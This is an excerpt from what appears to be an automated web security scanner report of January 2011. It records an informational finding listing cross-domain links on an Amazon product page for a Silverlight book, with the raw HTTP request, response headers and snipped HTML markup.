&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AILoGohU0wO8YwmMuaJYRC2Ufd6yMMPbRJAlerGEaA2UxVwzNHpOser4-YoUO7Fq7tcF97Lsm8IU6hPyHS09fzfHGnbYLOqBfy38GKqm.BOzGmBXLTg4sdxO5ehtHNxzfjS44.gZHwJTE2BQBHB21ote6l7JSiO3mecB7FDFS3i012jiQJdlXDwp5NJsjjI8qiQUAS26jJ5x2iz.kTuDq53e7rhBeaLYvQ8fB85QIGyJOVMyBC2.PGyutxgNJS2H186yc5N6UlISjfc35d4LD5wbO.Vtt8bgLtcHr7qUKyNkjP-Lc1pMm5kGWLr3XyoG2C1pZAhFklunHab5fIihOQRDIVZPKH.O189eGRB3HcsvnbC6j5oh-U2O78hTYKIfRTfb8PB2n4Fg-qEi0oVpOedY-jGvuIWWdqshc3acpEsX.CkBAUVEMii.6mN7DWgYi-njGSTjRAvCk0Q4mZ6NfdjE0DsE9wOc1WoalYsLS9bkHwdLAgqJfxsEHK0FNJsgWA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.<b>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 Unleashed" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Silverlight 4 in Action" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Pro Silverlight 4 in C#" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41d0pgdYWpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/WPF-4-Unleashed-Adam-Nathan/dp/0672331195/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0672331195" ><img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="WPF 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/180-9241494-4669614"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.374. http://www.amazon.com/gp/product/0981511821

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/0981511821

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/0981511821?ie=UTF8&tag=silverlightnet-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0981511821 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:58:41 GMT
Server: Server
x-amz-id-1: 13V0KQF0V1XJ5NS5286W
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: krsQPAyRTkKaWtVO1Qq8wH+YtbzOxVZQzpCY0xxgZ6WKMTOXRr1WipNt2+G1JcsA
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=178-7471219-5935264; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=2Evohz0OYRkA4UAReSxzZkzhJrFwKqKdSd7mQSKB+dvsdVoN4otgoD65IPJJ+uoILxi/rSyRC1DgEMOOZ5uQuV3QmQYFmUQyfSFioPEETNO8j/iwgis+kVIg+Gv/tTr96omQ6aYNdp/vpHNTL1M8Ot3sPXscz/KFTzQVdEvduTuDIISDQCBX/LAZijQRhELhAbo5RaaGSvKO9qeB3jGsepQ5bgvXwk8d+iVJbduxMv+UNjlFcxYHFV592dnJV26i03JnKIK+XoAP/XIg97hF5HDurLwM8PM1mm3D6pbjJb55sYHFj6H7fqpOxjXNQGLWF0EBxIFH8GHEAlKl4E7wBSDb4Rdd17c3ElL/g2eae4nUe1LaV6SYTs/lHNxfe8cUzV/Y7vRrnD4bYr1wEhmmKXyMhBze6hC5vFxowFeGh02fjr60th3VNjYyePNZJrLP4KZYbpK1kPY=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:58:42 2011 GMT
Content-Length: 326858


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_AA300_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
s/0981511821/ref=dp_image_z_0?ie=UTF8&n=283155&s=books" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_AA300_.jpg" id="prodImage" width="300" height="300" border="0" alt="Silverlight 4 Jumpstart" onmouseover="" /></a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFEdr-Sxo7y5y0B1-NbJ9br2UtBr.rbuDsocsqHYlU1ZJb9k6HLPyN1x3cb79LnoUXN8SoGFXDmzZXvA6yC7GpYuRosM6NMN-8oMOwg9lRSEAvbeGurIVpReQxXZnNMzMwRV2w2v5UtQYPlvJNoIxYBPK1yaSMgL97IyYGWpBopF1Ns1hVXd3KLTZFZ8rQjuNPjY2OV2eBci..A0S-d5EUf2gff0MowIW2ELYva6fAw-3ZDaO56VKLEF7SZHhwPTVGrA.cD88b0CU2HBnM1LnbqW.MryryE0XWWDaYDVLhcclwkzKsAUR4RJbMzqYwFrRd4ozh0X4mvZc8b0.fr8BwaW-MUd16kRgcKyLdaEsqgB2u2Z2UM7q7O1GxoY3zPdY6DChj2lulKk.xoq9ofCB1BOUlQr1Xk9yC0KnSP6BLGcSwE.ud0Nt41pXmucgRVIl.ky-YE0-i.rsTbYBjIe8j.DFHQG1Xv5.g__&awt=1&s=" rel="nofollow">60+ <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFEdr-Sxo7y5y0B1-NbJ9br2UtBr.rbuDsocsqHYlU1ZJb9k6HLPyN1x3cb79LnoUXN8SoGFXDmzZXvA6yC7GpYuRosM6NMN-8oMOwg9lRSEAvbeGurIVpReQxXZnNMzMwRV2w2v5UtQYPlvJNoIxYBPK1yaSMgL97IyYGWpBopF1Ns1hVXd3KLTZFZ8rQjuNPjY2OV2eBci..A0S-d5EUf2gff0MowIW2ELYva6fAw-3ZDaO56VKLEF7SZHhwPTVGrA.cD88b0CU2HBnM1LnbqW.MryryE0XWWDaYDVLhcclwkzKsAUR4RJbMzqYwFrRd4ozh0X4mvZc8b0.fr8BwaW-MUd16kRgcKyLdaEsqgB2u2Z2UM7q7O1GxoY3zPdY6DChj2lulKk.xoq9ofCB1BOUlQr1Xk9yC0KnSP6BLGcSwE.ud0Nt41pXmucgRVIl.ky-YE0-i.rsTbYBjIe8j.DFHQG1Xv5.g__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFEdr-Sxo7y5y0B1-NbJ9br2UtBr.rbuDsocsqHYlU1ZJb9k6HLPyN1x3cb79LnoUXN8SoGFXDmzZXvA6yC7GpYuRosM6NMN-8oMOwg9lRSEAvbeGurIVpReQxXZnNMzMwRV2w2v5UtQYPlvJNoIxYBPK1yaSMgL97IyYGWpBopF1Ns1hVXd3KLTZFZ8rQjuNPjY2OV2eBci..A0S-d5EUf2gff0MowIW2ELYva6fAw-3ZDaO56VKLEF7SZHhwPTVGrA.cD88b0CU2HBnM1LnbqW.MryryE0XWWDaYDVLhcclwkzKsAUR4RJbMzqYwFrRd4ozh0X4mvZc8b0.fr8BwaW-MUd16kRgcKyLdaEsqgB2u2Z2UM7q7O1GxoY3zPdY6DChj2lulKk.xoq9ofCB1BOUlQr1Xk9yC0KnSP6BLGcSwE.ud0Nt41pXmucgRVIl.ky-YE0-i.rsTbYBjIe8j.DFHQG1Xv5.g__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.componentone.com/freetrial</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMycm63-MSGQiOPE94MkUcF3QAaLOop-sKfbiC9iPa2K8gn3IvctrRSAPtnFD5zxMn5fe7C0gawQ3C7MRLZR.r9zXB018sw1Lz38IKagzezeY8UQ3g20caAtBKSvsps0W2RNWsL.RR6iSydbxqDdDRTqxObV4YhO8QboqbiEECUVgWwEVcITusEPQnqqXyezoCSs6bIbCehG8ywQ06eOH-nkdjZF9kEMD9rmfU74CzAVKEaSX.KXlTPSSc-nb6q19DGi0KGy3Cfb-N2OUfY1FrjkKlkk8KepVjRjNxNQqXxSfb2HfzekOgyVu-bPWAS0FUX2QL9C2wO7h7gaoxsQXxm2TaiC6iSfH4nTTFmrNcxGaZIsCl45wOXdDym5khFxEB5lpo0By5YviJcWgbYSQGhcXaPVZnwj2jF18wtu59z4d8GLB44syYXlzvtC7rMg6Jz0G2QuDPFIOmwWqHIZST8TflfUqUA32ZDa7FlW43QC&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMycm63-MSGQiOPE94MkUcF3QAaLOop-sKfbiC9iPa2K8gn3IvctrRSAPtnFD5zxMn5fe7C0gawQ3C7MRLZR.r9zXB018sw1Lz38IKagzezeY8UQ3g20caAtBKSvsps0W2RNWsL.RR6iSydbxqDdDRTqxObV4YhO8QboqbiEECUVgWwEVcITusEPQnqqXyezoCSs6bIbCehG8ywQ06eOH-nkdjZF9kEMD9rmfU74CzAVKEaSX.KXlTPSSc-nb6q19DGi0KGy3Cfb-N2OUfY1FrjkKlkk8KepVjRjNxNQqXxSfb2HfzekOgyVu-bPWAS0FUX2QL9C2wO7h7gaoxsQXxm2TaiC6iSfH4nTTFmrNcxGaZIsCl45wOXdDym5khFxEB5lpo0By5YviJcWgbYSQGhcXaPVZnwj2jF18wtu59z4d8GLB44syYXlzvtC7rMg6Jz0G2QuDPFIOmwWqHIZST8TflfUqUA32ZDa7FlW43QC&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMycm63-MSGQiOPE94MkUcF3QAaLOop-sKfbiC9iPa2K8gn3IvctrRSAPtnFD5zxMn5fe7C0gawQ3C7MRLZR.r9zXB018sw1Lz38IKagzezeY8UQ3g20caAtBKSvsps0W2RNWsL.RR6iSydbxqDdDRTqxObV4YhO8QboqbiEECUVgWwEVcITusEPQnqqXyezoCSs6bIbCehG8ywQ06eOH-nkdjZF9kEMD9rmfU74CzAVKEaSX.KXlTPSSc-nb6q19DGi0KGy3Cfb-N2OUfY1FrjkKlkk8KepVjRjNxNQqXxSfb2HfzekOgyVu-bPWAS0FUX2QL9C2wO7h7gaoxsQXxm2TaiC6iSfH4nTTFmrNcxGaZIsCl45wOXdDym5khFxEB5lpo0By5YviJcWgbYSQGhcXaPVZnwj2jF18wtu59z4d8GLB44syYXlzvtC7rMg6Jz0G2QuDPFIOmwWqHIZST8TflfUqUA32ZDa7FlW43QC&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">microsoft.com/Web/WebMatrix</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALXqcbhG9vM2D6irv8fEI3E4QH.8ayUB8ApsoG0sd23l6DXxy-ifDDo0l5PIc44D.UxFWpVX5AZRSNlrTctAW60Epq1GTlhbmnHotp1ILB57vr0xkkBG.mQcT6LOsjYAs0PEcTW5IvLn4tQhcMcYcGFOOYJaLCPxAuqYGY2iLiFQsM5RHnkG4ujZiV82jIBV3AeXxy-VfF5gCTEBbQubdGSzd5mLi-g2p.NAEbPYcn57UCqU-TrjOVgUzbASuIBnZ7pFP91UnSwfjfzNcqYGlYQ7nH6391oX8yZvvbL5M.0124JtRit5zMjiAB7HizaJLMJ2d2qDQ3xfpXSDb6G9KYFUdPaeunIDoGj6P7.iMQHlxzOWvotzTg60iBJwp8fc0TfzkB5.7Vksu32NfDe9mS4DNPSru3svFlOp64WCy0uQES9kDeJGqjkjWHdb.B2EYhXS3vrrkpYZKMApCZFLdasZGO6o92TTrw__&awt=1&s=" rel="nofollow"><b>Jumpstart</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALXqcbhG9vM2D6irv8fEI3E4QH.8ayUB8ApsoG0sd23l6DXxy-ifDDo0l5PIc44D.UxFWpVX5AZRSNlrTctAW60Epq1GTlhbmnHotp1ILB57vr0xkkBG.mQcT6LOsjYAs0PEcTW5IvLn4tQhcMcYcGFOOYJaLCPxAuqYGY2iLiFQsM5RHnkG4ujZiV82jIBV3AeXxy-VfF5gCTEBbQubdGSzd5mLi-g2p.NAEbPYcn57UCqU-TrjOVgUzbASuIBnZ7pFP91UnSwfjfzNcqYGlYQ7nH6391oX8yZvvbL5M.0124JtRit5zMjiAB7HizaJLMJ2d2qDQ3xfpXSDb6G9KYFUdPaeunIDoGj6P7.iMQHlxzOWvotzTg60iBJwp8fc0TfzkB5.7Vksu32NfDe9mS4DNPSru3svFlOp64WCy0uQES9kDeJGqjkjWHdb.B2EYhXS3vrrkpYZKMApCZFLdasZGO6o92TTrw__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALXqcbhG9vM2D6irv8fEI3E4QH.8ayUB8ApsoG0sd23l6DXxy-ifDDo0l5PIc44D.UxFWpVX5AZRSNlrTctAW60Epq1GTlhbmnHotp1ILB57vr0xkkBG.mQcT6LOsjYAs0PEcTW5IvLn4tQhcMcYcGFOOYJaLCPxAuqYGY2iLiFQsM5RHnkG4ujZiV82jIBV3AeXxy-VfF5gCTEBbQubdGSzd5mLi-g2p.NAEbPYcn57UCqU-TrjOVgUzbASuIBnZ7pFP91UnSwfjfzNcqYGlYQ7nH6391oX8yZvvbL5M.0124JtRit5zMjiAB7HizaJLMJ2d2qDQ3xfpXSDb6G9KYFUdPaeunIDoGj6P7.iMQHlxzOWvotzTg60iBJwp8fc0TfzkB5.7Vksu32NfDe9mS4DNPSru3svFlOp64WCy0uQES9kDeJGqjkjWHdb.B2EYhXS3vrrkpYZKMApCZFLdasZGO6o92TTrw__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.towingpros.net/Emergency</a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Jumpstart-David-Yack/dp/0981511821/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_SS75_.jpg" width="75" alt="Silverlight 4 Jumpstart" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Data and Services Cookbook" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Silverlight 4 in Action" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51PhrhFqJtL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/videoreview._V192249916_.jpg" width="109" alt="Video reviews" height="94" border="0" />
</td>
...[SNIP]...
</div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />


<script type="text/javascript">
...[SNIP]...
<div style="display:none;" id="cg-div">
